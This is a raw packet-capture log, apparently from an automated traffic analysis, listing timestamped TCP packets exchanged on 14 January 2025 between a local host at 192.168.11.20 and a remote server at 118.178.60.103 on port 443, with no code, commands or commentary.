                                                                        Jan 14, 2025 05:16:08.625463963 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.626521111 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.626739025 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.628205061 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.628441095 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.628623009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.631277084 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.631536007 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.632811069 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.632955074 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.633002996 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.635469913 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.635834932 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.637264013 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.637450933 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.638711929 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.638906002 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.638906002 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.638906002 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.641566038 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.641741037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.641741037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.643961906 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.644099951 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.644336939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.647336960 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.647717953 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.647717953 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.647717953 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.648216963 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.648358107 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.648590088 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.649502039 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.649671078 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.649852991 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.652338028 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.652518988 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.652518988 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.654944897 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.655114889 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.655298948 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.656487942 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.656668901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.656668901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.658220053 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.658406973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.660993099 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.661215067 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.662528992 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.662735939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.662918091 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.666886091 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.667052031 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.667052031 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.667460918 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.667664051 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.668519020 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.668742895 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.671308041 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.671473026 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.671473026 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.672988892 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.673136950 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.673136950 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.675843954 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.676033020 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.677550077 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.677726030 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.677803993 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.678991079 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.679168940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.679168940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.681786060 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.681991100 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.681991100 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.683495045 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.683831930 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.683831930 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.686080933 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.686274052 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.686451912 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.687736988 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.687918901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.687918901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.689421892 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.689565897 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.689565897 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.691956997 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.692176104 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.692224979 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.694886923 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.695132971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.696357965 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.696496964 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.696749926 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.697984934 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.698250055 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.700676918 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.700850010 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.700850010 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.702291965 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.702601910 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.705066919 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.705260038 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.705324888 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.707186937 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.707360029 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.707540989 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.707844019 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.708019018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.708199978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.710779905 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.710961103 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.710962057 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.712203026 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.712325096 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.712373018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.715065956 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.715322971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.716736078 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.717152119 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.718127966 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.718271017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.718455076 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.720702887 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.720891953 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.722148895 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.722322941 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.722369909 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.724792957 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.725020885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.726180077 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.726437092 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.729001999 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.729195118 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.730329990 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.730478048 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.730478048 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.731923103 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.732067108 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.732067108 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.734575987 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.734724998 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.734774113 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.735959053 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.736107111 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.736197948 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.738502979 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.738733053 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.738811016 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.739769936 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.739902973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.739902973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.740145922 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.741414070 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.741609097 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.741790056 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.744091034 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.744277000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.745529890 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.745729923 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.747980118 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.748131990 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.748131990 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.749500036 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.749741077 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.749741077 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.749970913 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.751056910 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.751267910 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.753418922 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.753539085 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.753539085 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.753772974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.754868984 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.755003929 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.755230904 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.757112026 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.757312059 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.757493973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.758588076 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.758729935 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.758729935 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.759921074 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.760185957 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.762264967 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.762470961 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.764743090 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.764990091 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.766093016 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.766289949 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.767374039 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.767544985 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.767729998 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.769807100 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.769988060 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.770168066 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.771326065 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.771600008 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.773665905 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.773900986 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.774081945 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.774949074 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.775130033 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.776283979 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.776552916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.778671980 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.779021978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.780117035 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.780257940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.780538082 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.782495975 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.782634974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.782634974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.783857107 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.783978939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.783978939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.784219980 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.785010099 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.785130978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.785130978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.785363913 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.787275076 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.787447929 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.787513018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.789782047 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.790035009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.791187048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.791399956 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.792279005 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.792427063 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.792427063 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.794615984 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.794792891 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.794792891 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.795866966 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.796144009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.798166037 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.798407078 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.798588037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.799570084 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.799803972 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.800843954 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.801076889 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.803081989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.803369999 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.804451942 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.804660082 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.806432009 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.806636095 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.807512045 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.807702065 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.808518887 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.808664083 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.808845997 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.809983969 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.810198069 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.811189890 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.811393976 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.812774897 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.812927961 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.812927961 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.813787937 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.814007044 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.814060926 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.814789057 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.815053940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.816271067 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.816503048 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.817301989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.817447901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.817447901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.818983078 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.819242954 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.820120096 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.820300102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.821600914 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.821752071 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.821984053 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.822715998 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.822896004 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.823687077 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.823909998 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.825489044 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.825668097 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.825746059 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.826275110 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.826459885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.826642036 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.827781916 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.827924013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.828154087 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.828808069 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.828943968 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.829050064 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.829715014 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.829957962 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.831480980 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.832439899 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.832623959 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.832995892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.834131956 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.834314108 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.835042953 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.835248947 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.835431099 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.835907936 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.836107969 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.837413073 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.837742090 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.839063883 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.839267015 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.839842081 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.840040922 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.840913057 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.841106892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.841106892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.841284037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.842459917 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.842605114 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.842683077 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.843481064 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.843645096 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.843827009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.845077991 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.845221043 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.845278025 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.845879078 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.846059084 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.846884012 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.847038031 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.847215891 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.848244905 CET44349770118.178.60.103192.168.11.20
